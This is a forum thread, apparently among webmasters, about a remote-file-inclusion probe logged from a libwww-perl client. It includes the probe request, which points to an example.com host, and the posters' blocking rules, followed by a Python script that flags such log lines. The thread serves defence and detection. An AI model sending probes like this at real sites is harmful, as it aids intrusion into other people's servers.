77.221.x.x - - [12/Jul/2009:13:44:09 -0700] GET /.scanhttp://aneh.example.com/id.txt?%0D? HTTP/1.1" 403 137 "-" "libwww-perl/5.805"
[edited by: jdMorgan at 1:39 am (utc) on July 14, 2009]
[edit reason] example.com for members' safety. [/edit]
Personally, I don't know what these guys are up to, but I block any request that has "http" in the requested URL-path or query string, and I block libwww-perl with only a few exceptions.
Too many exploiters, so little time: I say 403 and be done with it...
BTW: Half of the XSS injection probes coming from the USSR have the user agent "Mozilla/5.0" - which I also block. I have not seen one legitimate browser that goes by that exact user agent.
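The three checks described in the posts above ("http" in the URL-path or query string, a libwww-perl user agent with a few exceptions, and the exact user agent "Mozilla/5.0"), applied to access-log lines as an added example that is not part of the original thread. It assumes Combined Log Format; the rule names, the allowlisted address and the sample lines are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Assumed input: Apache/NCSA Combined Log Format.
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>[^\s"]+)[^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)

# Hypothetical allowlist standing in for the post's "few exceptions" for libwww-perl.
LIBWWW_ALLOWED_HOSTS = {"198.51.100.7"}

def classify(line):
    """Return the names of the rules a log line trips; [] means it passes."""
    m = LOG_RE.match(line.strip())
    if not m:
        return ["unparsed"]
    hits = []
    # Rule 1: "http" anywhere in the URL-path or query string. Percent-decode
    # twice so single- and double-encoded forms (%68ttp, %2568ttp) still match.
    target = unquote(unquote(m["target"])).lower()
    if "http" in target:
        hits.append("http-in-target")
    # Rule 2: libwww-perl user agent, unless the client is an allowed exception.
    if "libwww-perl" in m["ua"].lower() and m["host"] not in LIBWWW_ALLOWED_HOSTS:
        hits.append("libwww-perl")
    # Rule 3: user agent is exactly "Mozilla/5.0" with nothing after it.
    if m["ua"] == "Mozilla/5.0":
        hits.append("bare-mozilla-ua")
    return hits

# Constructed sample lines (documentation addresses and example.com hosts).
SAMPLE = [
    '192.0.2.10 - - [12/Jul/2009:13:44:09 -0700] "GET /index.php?page=http://files.example.com/id.txt? HTTP/1.1" 403 137 "-" "libwww-perl/5.805"',
    '192.0.2.11 - - [12/Jul/2009:13:45:02 -0700] "GET /index.php?page=%68ttp%3A%2F%2Ffiles.example.com%2Fid.txt HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [12/Jul/2009:13:46:30 -0700] "GET /feed.xml HTTP/1.1" 200 2048 "-" "libwww-perl/5.805"',
    '192.0.2.12 - - [12/Jul/2009:13:47:11 -0700] "GET /about.html HTTP/1.1" 200 900 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1) Gecko/20090624 Firefox/3.5"',
]

if __name__ == "__main__":
    for line in SAMPLE:
        # Print the verdict next to the request line for a quick review.
        print(classify(line) or ["pass"], line.split('"')[1])
```

Rule 1 is as broad as the post states it, so a legitimate path such as /http-headers.html would also be flagged.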